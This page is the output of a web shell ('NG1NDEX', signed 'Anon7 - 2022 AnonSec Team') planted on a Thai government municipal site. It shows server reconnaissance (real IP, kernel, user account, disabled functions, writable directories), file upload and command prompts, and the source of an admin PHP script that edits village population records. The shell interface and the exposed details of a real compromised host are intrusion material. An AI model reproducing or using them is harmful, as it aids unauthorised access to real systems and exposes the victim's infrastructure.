NG1NDEX
Server IP : 103.233.192.212  /  Your IP : 18.189.188.157
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/data/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/data/action/save-VillageMain-edit.php
<?php
require_once('session_backend_administrator.php');
header('Content-Type: text/html; charset=UTF-8');
date_default_timezone_set("Asia/Bangkok"); 
$datetime = date('d/m/Y H.i'); 

if($STT_login=="admin_login_true"){

    if( !isset($_POST['edt_oldid']) or !isset($_POST['edt_id']) or !isset($_POST['edt_name']) or !isset($_POST['edt_family']) or !isset($_POST['edt_male']) or !isset($_POST['edt_female']) or !isset($_POST['edt_total']) ){
        echo "<SCRIPT type='text/javascript'>
                alert('กรุณากรอกข้อมูลให้ครบ');
                window.location.replace(document.referrer);
            </SCRIPT>";
        exit;
    }else{
        //old
        $check_oldid_village = trim($con_db_administrator->real_escape_string($_POST['edt_oldid']));
        //new
        $check_id_village = trim($con_db_administrator->real_escape_string($_POST['edt_id']));
        $check_name_village = trim($con_db_administrator->real_escape_string($_POST['edt_name']));

        $data_insert_family_village = $con_db_administrator->real_escape_string($_POST['edt_family']);
        $data_insert_total_male_village = $con_db_administrator->real_escape_string($_POST['edt_male']);
        $data_insert_total_female_village = $con_db_administrator->real_escape_string($_POST['edt_female']);
        $data_insert_total_all_village = $con_db_administrator->real_escape_string($_POST['edt_total']);

        if( $check_oldid_village == $check_id_village ){
                /////// update DATA to SQL
                $ud_data = " UPDATE `data_village` SET `name_village`='$check_name_village',`family_village`='$data_insert_family_village', `total_male_village`='$data_insert_total_male_village',
                        `total_female_village`='$data_insert_total_female_village', `total_all_village`='$data_insert_total_all_village', `lastupdate_village`='$datetime' 
                        WHERE `id_village`='$check_oldid_village' ";  
                $action_ud_data = $con_db_administrator->query($ud_data);
                if(!$action_ud_data){
                    echo "<SCRIPT type='text/javascript'>
                            alert('เกิดข้อผิดพลาด ! แก้ไขข้อมูลไม่สำเร็จ');
                            window.location.replace('../VillageMain');
                        </SCRIPT>";
                    exit;
                }else{
                    $ud_data_dt = " UPDATE `data_dataother` SET `lastupdate_dataother`='$datetime' WHERE `id_dataother` = 4 ";  
                    $action_ud_data_dt = $con_db_administrator->query($ud_data_dt);

                    echo "<SCRIPT type='text/javascript'>
                            alert('แก้ไขข้อมูล สำเร็จ');
                            window.location.replace('../VillageMain');
                        </SCRIPT>";
                    exit;
                }
        }else{
            /////// เช็คข้อมูล id ซ้ำ
            $sql_check_id = " SELECT COUNT(*) FROM `data_village` WHERE `id_village`='$check_id_village' ";
            $qr_check_id = mysqli_query($con_db_administrator, $sql_check_id) or trigger_error("sql_check_village", E_USER_ERROR);
            $rs_check_id = mysqli_fetch_row($qr_check_id);
            $check_id = $rs_check_id[0]; 
            if($check_id >= 1){
                echo "<SCRIPT type='text/javascript'>
                        alert('หมู่ที่ [ $check_id_village ] ซ้ำ');
                        window.location.replace(document.referrer);
                    </SCRIPT>";
                exit;
            }else{
                /////// update DATA to SQL
                $ud_data = " UPDATE `data_village` SET `id_village`='$check_id_village', `name_village`='$check_name_village', `family_village`='$data_insert_family_village', `total_male_village`='$data_insert_total_male_village',
                        `total_female_village`='$data_insert_total_female_village', `total_all_village`='$data_insert_total_all_village', `lastupdate_village`='$datetime' 
                        WHERE `id_village`='$check_oldid_village' ";  
                $action_ud_data = $con_db_administrator->query($ud_data);
                if(!$action_ud_data){
                    echo "<SCRIPT type='text/javascript'>
                            alert('เกิดข้อผิดพลาด ! แก้ไขข้อมูลไม่สำเร็จ');
                            window.location.replace('../VillageMain');
                        </SCRIPT>";
                    exit;
                }else{
                    $ud_data_dt = " UPDATE `data_dataother` SET `lastupdate_dataother`='$datetime' WHERE `id_dataother` = 4 ";  
                    $action_ud_data_dt = $con_db_administrator->query($ud_data_dt);

                    echo "<SCRIPT type='text/javascript'>
                            alert('แก้ไขข้อมูล สำเร็จ');
                            window.location.replace('../VillageMain');
                        </SCRIPT>";
                    exit;
                }
            }

        }
    }

}else{
    echo "<SCRIPT type='text/javascript'>
        alert('กรุณาเข้าสู่ระบบ');
        window.location.replace('../../index');
    </SCRIPT>";
    exit;
}
mysqli_close($con_db_administrator);
?>

Anon7 - 2022
AnonSec Team